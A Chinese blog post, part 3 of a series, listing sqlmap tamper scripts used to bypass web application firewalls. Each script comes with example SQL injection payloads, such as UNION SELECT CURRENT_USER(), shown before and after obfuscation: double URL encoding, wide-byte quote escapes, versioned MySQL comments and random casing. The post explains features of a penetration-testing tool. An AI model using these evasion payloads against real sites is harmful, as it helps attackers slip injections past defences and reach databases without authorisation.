注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

Sqlmap Tamper大全(3)  

2014-08-12 10:44:42|  分类: WAF绕过 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
脚本名:sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
Example:

1
2
('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

Requirement:
* MSSQL
———————————————————————————
脚本名:chardoubleencode.py 双url编码(不处理以编码的)
Example:

1
2
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

———————————————————————————
脚本名:unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
Example:

1
2
('-1 UNION ALL SELECT')
'-1 UNION SELECT'

Requirement:
all
——————————————————————————-
脚本名:charencode.py
作用:url编码
Example:

1
2
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
  •  The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS
————————————————————
脚本名:randomcase.py
作用:随机大小写
Example:

1
2
* Input: INSERT
* Output: InsERt

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
———————————————————————-
脚本名:unmagicquotes.py
作用:宽字符绕过 GPC  addslashes
Example:

1
2
* Input: 1 AND 1=1
* Output: 1%bf%27 AND 1=1%20

Notes:
  • Useful for bypassing magic_quotes/addslashes feature
——————————————————————————–
脚本名:randomcomments.py
作用:用/**/分割sql关键字
Example:
1
INSERT becomes IN//S//ERT’
————————————————————————
脚本名:versionedkeywords.py
作用:Encloses each non-function keyword with versioned MySQL comment
Example:

1
2
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:
* MySQL
 —————————————————————————-
脚本名:charunicodeencode.py
作用:字符串 unicode 编码
Example:

1
2
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

Requirement:

* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
  • Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
 —————————————————————————-
脚本名:securesphere.py
作用:追加特制的字符串
Example:

1
2
('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"

Tested against:
all
 —————————————————————————-
脚本名:versionedmorekeywords.py
作用:注释绕过
Example:

1
2
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:
* MySQL >= 5.1.13
 —————————————————————————-
脚本名:space2comment.py
作用:Replaces space character (‘ ‘) with comments ‘/**/’
Example:

1
2
* Input: SELECT id FROM users
* Output: SELECT//id//FROM/**/users

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass weak and bespoke web application firewalls
 —————————————————————————-
脚本名:halfversionedmorekeywords.py
作用:关键字前加注释
Example:

1
2
* Input: value UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa
* Output: value/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

Requirement:
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
 —————————————————————————-
  评论这张
 
阅读(77)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017